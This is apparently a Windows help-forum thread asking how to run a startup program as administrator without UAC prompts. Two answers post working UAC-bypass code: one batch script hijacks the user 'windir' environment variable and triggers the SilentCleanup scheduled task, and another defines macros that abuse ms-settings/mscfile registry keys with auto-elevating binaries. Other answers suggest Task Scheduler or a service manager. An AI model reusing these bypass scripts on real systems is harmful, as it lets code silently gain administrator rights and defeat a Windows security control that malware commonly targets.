StartUp Program UAC Bypass

Question

I'm currently using a Windows 10 Desktop home computer and I would like to add a program to the startup folder "C:\Users\%username"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" However I would like to run the program as administrator, is there a way to make it run a system/admin without prompting UAC everytime the computer loads up? A batch/vbs script is preferable.

Frosty · Answer 1 · 2019-04-23T19:46:18.073

1

I have found a script of the web, modified it so it works as a batch.

if EXIST %temp%\cmd.ps1 (del %temp%\cmd.ps1 /s /q)
echo if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) { >> %temp%\cmd.ps1
(
echo cmd /c start cmd.exe
echo } else {
echo     $registryPath = "HKCU:\Environment"
echo    $Name = "windir"
echo    $Value = "powershell -ep bypass -w h $PSCommandPath;#"
echo    Set-ItemProperty -Path $registryPath -Name $name -Value $Value
echo    schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I 
echo    Remove-ItemProperty -Path $registryPath -Name $name
echo }
)>> %temp%\cmd.ps1

Powershell.exe -exec bypass -File  %temp%\cmd.ps1

/////////// The script creates a powershell file with a uac and execpol bypass, sorry the code is a little bit botched. Source: https://forums.hak5.org/topic/45439-powershell-real-uac-bypass/

Note: If your not administrator powershell seems to spaz out and reopens its self in a loop

edited Apr 23 '19 at 19:46

answered Apr 23 '19 at 19:27

Frosty

21

This still uses Task Scheduler. And if that is the case, then why not just create the task and set startup as parameter.... – LPChip Apr 24 '19 at 06:29
@LPChip because the only reason task scheduler can bypass because it can auto-elevate. this script uses an exploit – ScriptKidd Mar 21 '20 at 10:57
the script works but is very hacky and unoriginal, why not just use REG ADD and REG DELETE instead – ScriptKidd Mar 21 '20 at 11:28

score 0 · Answer 2 · answered Apr 23 '19 at 18:56

0

The only way to do this is to create a Task using Task Scheduler.

From there you can make it run as the user, interactive, with highest privileges, and there won't be a UAC prompt.

The only problem with this approach is, that it will consume a bit extra CPU for as long as the program is running, as Task Scheduler is running at the same time monitoring the output of the program, even if there isn't any.

You may want to look into why this program requires UAC access in the first place, and see if you can avoid it. For example, if the program runs from a location where the user does not have write access to the folder, it will want to run as Administrator too.

answered Apr 23 '19 at 18:56

LPChip

61,264

Is it still not possible even with an external program? – Frosty Apr 23 '19 at 19:00
Don't you think, that if it were possible, Microsoft would have a huge security flaw on their hands? Nope, using a scheduled task is already sort of breaking the rules, but in Microsoft's defense, creating the task also requires UAC, but then executing does not have to be, so the security is somewhat reduced. – LPChip Apr 23 '19 at 19:01
I have posted working code on my computer, feel free to test it for your self :) – Frosty Apr 23 '19 at 19:28
incorrect. SCHTASKS is only one of the auto-elevate executables – ScriptKidd Apr 19 '20 at 08:38

ScriptKidd · Answer 3 · 2020-03-26T13:50:36.683

In addition to the Task Scheduler and your answer, you can use the macro style invented by @jeb, @dbenham and DosTips user @Ed Dyreen:

MACRO-EnvBypass.bat: for Windows 8.1&10 (AlwaysNotify Compatible)

@echo off

:: SYNTAX
::::::::::::::::::::::::::::::::::::::::::::::
::  CALL MACRO-EnvBypass.bat                ::
::  %$MACRO.EnvBypass% FILE1 FILE2 FILE3    ::
::::::::::::::::::::::::::::::::::::::::::::::

SETLOCAL DISABLEDELAYEDEXPANSION

::Definitions
( set LF=^
%= EMPTY =%
)
set ^"NL=^^^%LF%%LF%^%LF%%LF%^^"

::Windows Version
for /f "tokens=4-5 delims=. " %%i in ('ver') do set WIN_VER=%%i.%%j
if "%WIN_VER%" NEQ "10.0" (
    echo ERR: VERSION_INCOMPATIBLE
    exit /b 1
)

::Macro

ENDLOCAL &^
set $MACRO.EnvBypass=FOR %%a in (args main) do if "%%a" == "main" (%NL%
    for %%A in (%payload%) do (%NL%
        REG ADD "HKCU\Environment" /v "windir" /d "%%A && REM " /F%NL%
        schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I%NL%
        REG DELETE "HKCU\Environment" /v "windir" /F%NL%
    )%NL%
) ELSE SETLOCAL ENABLEDELAYEDEXPANSION ^& set payload=,
exit /b

MACRO-elev.bat: for Windows 7~0-day


:: SYNTAX
::::::::::::::::::::::::::::::::::::::::::
::  CALL macro-elev.bat                 ::
::  %$MACRO.elev% FILE1 FILE2 FILE3     ::
::::::::::::::::::::::::::::::::::::::::::

SETLOCAL DISABLEDELAYEDEXPANSION

::Definitions

( set LF=^
%= EMPTY =%
)
set ^"NL=^^^%LF%%LF%^%LF%%LF%^^"

::Windows Version

for /f "tokens=4-5 delims=. " %%i in ('ver') do set WIN_VER=%%i.%%j

if "%WIN_VER%" equ "10.0" (
    set "vuln=ms-settings"
    set "trigger=ComputerDefaults.exe"
) ELSE (
    set "vuln=mscfile" 
    set "trigger=CompMgmtLauncher.exe"
)
set regPath="HKCU\Software\Classes\%vuln%\shell\open\command"

::Macro

ENDLOCAL &^
set $MACRO.elev=FOR %%a in (args main) do if "%%a" == "main" (%NL%
    for %%j in (!payload!) do (%NL%
        reg add %regpath% /d "%%j" /f%NL%
        reg add %regpath% /v DelegateExecute /f%NL%
        %trigger%%NL%
        reg delete "HKCU\Software\Classes\%vuln%" /f%NL%
    )%NL%
) ELSE SETLOCAL ENABLEDELAYEDEXPANSION ^& set payload=,

For how the exploit works, see my full answer here. Make sure to also check out the UACME repository.

score 0 · Answer 4 · answered Mar 21 '20 at 12:18

0

How about creating a service from the executable, using NSSM the so-called Non-Sucking Service Manager?

It's very easy to use, if you are sure you know what you are doing...

answered Mar 21 '20 at 12:18

StartUp Program UAC Bypass

4 Answers4